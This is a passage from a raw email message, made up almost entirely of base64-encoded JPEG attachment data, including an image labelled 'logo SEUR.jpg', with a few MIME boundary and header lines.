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 ------=_NextPart_000_0022_01C217D4.8D47E540 Content-Type: image/jpeg; name="logo SEUR.jpg" Content-Transfer-Encoding: base64 Content-ID: <002001c217c3$c9afd300$0100c0a8@jose> /9j/4AAQSkZJRgABAgEASABIAAD/7QrwUGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAASAAAAAEA AgBIAAAAAQACOEJJTQQNAAAAAAAEAAAAeDhCSU0D8wAAAAAACAAAAAAAAAAAOEJJTQQKAAAAAAAB AAA4QklNJxAAAAAAAAoAAQAAAAAAAAACOEJJTQP1AAAAAABIAC9mZgABAGxmZgAGAAAAAAABAC9m ZgABAKGZmgAGAAAAAAABADIAAAABAFoAAAAGAAAAAAABADUAAAABAC0AAAAGAAAAAAABOEJJTQP4 AAAAAABwAAD/////////////////////////////A+gAAAAA//////////////////////////// /wPoAAAAAP////////////////////////////8D6AAAAAD///////////////////////////// A+gAADhCSU0ECAAAAAAAEAAAAAEAAAJAAAACQAAAAAA4QklNBBQAAAAAAAQAAAABOEJJTQQMAAAA AAlfAAAAAQAAAHAAAAAsAAABUAAAOcAAAAlDABgAAf/Y/+AAEEpGSUYAAQIBAEgASAAA/+4ADkFk b2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMTFRMTGBEMDAwMDAwRDAwMDAwM DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAENCwsNDg0QDg4QFA4ODhQUDg4ODhQRDAwMDAwREQwMDAwM DBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgALABwAwEiAAIRAQMRAf/dAAQAB//E AT8AAAEFAQEBAQEBAAAAAAAAAAMAAQIEBQYHCAkKCwEAAQUBAQEBAQEAAAAAAAAAAQACAwQFBgcI CQoLEAABBAEDAgQCBQcGCAUDDDMBAAIRAwQhEjEFQVFhEyJxgTIGFJGhsUIjJBVSwWIzNHKC0UMH JZJT8OHxY3M1FqKygyZEk1RkRcKjdDYX0lXiZfKzhMPTdePzRieUpIW0lcTU5PSltcXV5fVWZnaG lqa2xtbm9jdHV2d3h5ent8fX5/cRAAICAQIEBAMEBQYHBwYFNQEAAhEDITESBEFRYXEiEwUygZEU obFCI8FS0fAzJGLhcoKSQ1MVY3M08SUGFqKygwcmNcLSRJNUoxdkRVU2dGXi8rOEw9N14/NGlKSF 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 ciBzcGFjZSAtIHNSR0IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGVzYwAAAAAAAAAsUmVmZXJlbmNl IFZpZXdpbmcgQ29uZGl0aW9uIGluIElFQzYxOTY2LTIuMQAAAAAAAAAAAAAALFJlZmVyZW5jZSBW aWV3aW5nIENvbmRpdGlvbiBpbiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AHZpZXcAAAAAABOk/gAUXy4AEM8UAAPtzAAEEwsAA1yeAAAAAVhZWiAAAAAAAEwJVgBQAAAAVx/n bWVhcwAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAo8AAAACc2lnIAAAAABDUlQgY3VydgAAAAAA AAQAAAAABQAKAA8AFAAZAB4AIwAoAC0AMgA3ADsAQABFAEoATwBUAFkAXgBjAGgAbQByAHcAfACB AIYAiwCQAJUAmgCfAKQAqQCuALIAtwC8AMEAxgDLANAA1QDbAOAA5QDrAPAA9gD7AQEBBwENARMB GQEfASUBKwEyATgBPgFFAUwBUgFZAWABZwFuAXUBfAGDAYsBkgGaAaEBqQGxAbkBwQHJAdEB2QHh AekB8gH6AgMCDAIUAh0CJgIvAjgCQQJLAlQCXQJnAnECegKEAo4CmAKiAqwCtgLBAssC1QLgAusC 9QMAAwsDFgMhAy0DOANDA08DWgNmA3IDfgOKA5YDogOuA7oDxwPTA+AD7AP5BAYEEwQgBC0EOwRI BFUEYwRxBH4EjASaBKgEtgTEBNME4QTwBP4FDQUcBSsFOgVJBVgFZwV3BYYFlgWmBbUFxQXVBeUF 9gYGBhYGJwY3BkgGWQZqBnsGjAadBq8GwAbRBuMG9QcHBxkHKwc9B08HYQd0B4YHmQesB78H0gfl B/gICwgfCDIIRghaCG4IggiWCKoIvgjSCOcI+wkQCSUJOglPCWQJeQmPCaQJugnPCeUJ+woRCicK PQpUCmoKgQqYCq4KxQrcCvMLCwsiCzkLUQtpC4ALmAuwC8gL4Qv5DBIMKgxDDFwMdQyODKcMwAzZ DPMNDQ0mDUANWg10DY4NqQ3DDd4N+A4TDi4OSQ5kDn8Omw62DtIO7g8JDyUPQQ9eD3oPlg+zD88P 7BAJECYQQxBhEH4QmxC5ENcQ9RETETERTxFtEYwRqhHJEegSBxImEkUSZBKEEqMSwxLjEwMTIxND E2MTgxOkE8UT5RQGFCcUSRRqFIsUrRTOFPAVEhU0FVYVeBWbFb0V4BYDFiYWSRZsFo8WshbWFvoX HRdBF2UXiReuF9IX9xgbGEAYZRiKGK8Y1Rj6GSAZRRlrGZEZtxndGgQaKhpRGncanhrFGuwbFBs7 G2MbihuyG9ocAhwqHFIcexyjHMwc9R0eHUcdcB2ZHcMd7B4WHkAeah6UHr4e6R8THz4faR+UH78f 6iAVIEEgbCCYIMQg8CEcIUghdSGhIc4h+yInIlUigiKvIt0jCiM4I2YjlCPCI/AkHyRNJHwkqyTa JQklOCVoJZclxyX3JicmVyaHJrcm6CcYJ0kneierJ9woDSg/KHEooijUKQYpOClrKZ0p0CoCKjUq aCqbKs8rAis2K2krnSvRLAUsOSxuLKIs1y0MLUEtdi2rLeEuFi5MLoIuty7uLyQvWi+RL8cv/jA1 MGwwpDDbMRIxSjGCMbox8jIqMmMymzLUMw0zRjN/M7gz8TQrNGU0njTYNRM1TTWHNcI1/TY3NnI2 rjbpNyQ3YDecN9c4FDhQOIw4yDkFOUI5fzm8Ofk6Njp0OrI67zstO2s7qjvoPCc8ZTykPOM9Ij1h PaE94D4gPmA+oD7gPyE/YT+iP+JAI0BkQKZA50EpQWpBrEHuQjBCckK1QvdDOkN9Q8BEA0RHRIpE zkUSRVVFmkXeRiJGZ0arRvBHNUd7R8BIBUhLSJFI10kdSWNJqUnwSjdKfUrESwxLU0uaS+JMKkxy TLpNAk1KTZNN3E4lTm5Ot08AT0lPk0/dUCdQcVC7UQZRUFGbUeZSMVJ8UsdTE1NfU6pT9lRCVI9U 21UoVXVVwlYPVlxWqVb3V0RXklfgWC9YfVjLWRpZaVm4WgdaVlqmWvVbRVuVW+VcNVyGXNZdJ114 XcleGl5sXr1fD19hX7NgBWBXYKpg/GFPYaJh9WJJYpxi8GNDY5dj62RAZJRk6WU9ZZJl52Y9ZpJm 6Gc9Z5Nn6Wg/aJZo7GlDaZpp8WpIap9q92tPa6dr/2xXbK9tCG1gbbluEm5rbsRvHm94b9FwK3CG cOBxOnGVcfByS3KmcwFzXXO4dBR0cHTMdSh1hXXhdj52m3b4d1Z3s3gReG54zHkqeYl553pGeqV7 BHtje8J8IXyBfOF9QX2hfgF+Yn7CfyN/hH/lgEeAqIEKgWuBzYIwgpKC9INXg7qEHYSAhOOFR4Wr hg6GcobXhzuHn4gEiGmIzokziZmJ/opkisqLMIuWi/yMY4zKjTGNmI3/jmaOzo82j56QBpBukNaR P5GokhGSepLjk02TtpQglIqU9JVflcmWNJaflwqXdZfgmEyYuJkkmZCZ/JpomtWbQpuvnByciZz3 nWSd0p5Anq6fHZ+Ln/qgaaDYoUehtqImopajBqN2o+akVqTHpTilqaYapoum/adup+CoUqjEqTep qaocqo+rAqt1q+msXKzQrUStuK4trqGvFq+LsACwdbDqsWCx1rJLssKzOLOutCW0nLUTtYq2AbZ5 tvC3aLfguFm40blKucK6O7q1uy67p7whvJu9Fb2Pvgq+hL7/v3q/9cBwwOzBZ8Hjwl/C28NYw9TE UcTOxUvFyMZGxsPHQce/yD3IvMk6ybnKOMq3yzbLtsw1zLXNNc21zjbOts83z7jQOdC60TzRvtI/ 0sHTRNPG1EnUy9VO1dHWVdbY11zX4Nhk2OjZbNnx2nba+9uA3AXcit0Q3ZbeHN6i3ynfr+A24L3h ROHM4lPi2+Nj4+vkc+T85YTmDeaW5x/nqegy6LzpRunQ6lvq5etw6/vshu0R7ZzuKO6070DvzPBY 8OXxcvH/8ozzGfOn9DT0wvVQ9d72bfb794r4Gfio+Tj5x/pX+uf7d/wH/Jj9Kf26/kv+3P9t//// 7gAOQWRvYmUAZIAAAAAB/9sAhAAQCwsLDAsQDAwQFw8NDxcbFBAQFBsfFxcXFxcfEQwMDAwMDBEM DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAREPDxETERUSEhUUDg4OFBQODg4OFBEMDAwMDBER DAwMDAwMEQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAz/wAARCABOAMgDASIAAhEBAxEB/90A BAAN/8QAqwABAAIDAQEAAAAAAAAAAAAAAAUGAgMEBwEBAAIDAQAAAAAAAAAAAAAAAAADAQIEBRAA AgECAwIHCwgHBQkAAAAAAQIDAAQREgUhEzEiMkIjMwZBkVJiokNTgxRkJlFygmOTVBUWYXGBktJz o/DRs+MksuLD0zRElLTUEQABAwIDBQcDBQEAAAAAAAACAAEDERIiEwQhMTJSkkFRkUJiUxRhgaFx crIjBbH/2gAMAwEAAhEDEQA/APQKUpQhKUpQhKUpQhKUpQhKUpQhKUpQhK1zSpDGZHxyrw4DHh2V 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 